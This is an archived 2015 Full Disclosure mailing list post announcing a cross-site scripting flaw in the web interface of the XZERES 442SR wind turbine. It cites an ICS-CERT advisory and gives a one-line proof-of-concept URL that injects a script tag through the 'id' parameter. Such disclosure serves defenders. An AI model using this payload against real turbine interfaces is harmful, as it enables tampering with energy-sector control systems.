Full Disclosure mailing list archives
XZERES 442SR Wind Turbine XSS
From: Karn Ganeshen <karnganeshen () gmail com>
Date: Thu, 24 Dec 2015 18:05:36 +0000
XZERES 442SR Wind Turbine Cross-site Scripting Vulnerability *AFFECTED PRODUCTS* XZERES is a US-based energy company that maintains offices in several countries around the world, including the UK, Italy, Japan, Vietnam, Philippines, and Myanmar. The affected product, 442SR Wind Turbine, has a web-based interface system. According to XZERES, the 442SR is deployed across the Energy sector. XZERES estimates that this product is used worldwide. *Reference* https://ics-cert.us-cert.gov/advisories/ICSA-15-342-01 *Vulnerable parameter* id *PoC* http://<IP>/details?object=Inverter&id=2<script>alert(xss-id-parameter") </script> -- Best Regards, Karn Ganeshen _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- XZERES 442SR Wind Turbine XSS Karn Ganeshen (Dec 24)